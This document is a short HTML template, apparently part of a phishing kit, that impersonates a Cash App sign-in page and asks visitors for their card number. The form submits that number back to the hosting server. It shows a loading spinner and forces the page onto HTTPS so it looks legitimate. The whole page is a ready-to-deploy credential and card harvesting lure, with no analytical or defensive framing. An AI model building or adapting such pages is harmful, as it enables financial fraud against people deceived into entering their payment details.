<!DOCTYPE html>
<html lang="en">
<head>
          <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<link type="text/css" rel="stylesheet" href="{{url_for('static', filename='cashapp/css/style.css')}}"/>

  <meta charset="UTF-8">
  <title>Cash App - Sign in to your account</title>

</head>
<body>

<form action="#" method="post" id="cashapplogin">
<center><h2>Enter your card number connect to your Cashapp</h2></center>
<br>
<center><input type="text" id="card" name="card" class="email" placeholder="Card Number"><br><br>
<div class="show"><button class="submit" type="submit">Sign in</button></div><div class="hide"><button class="submit" type="submit"><center><div class="lds-ring"><div></div><div></div><div></div><div></div></div></center></button></div>

</center>
</form>

   <script>

var loc = window.location.href+'';
if (loc.indexOf('http://')==0){
    window.location.href = loc.replace('http://','https://');
}
   </script>

<script>
$(".hide").hide();
$("#cashapplogin").on("submit", function(){
     $(".hide").show();
     $(".show").hide();
});

</script>
</body>
</html>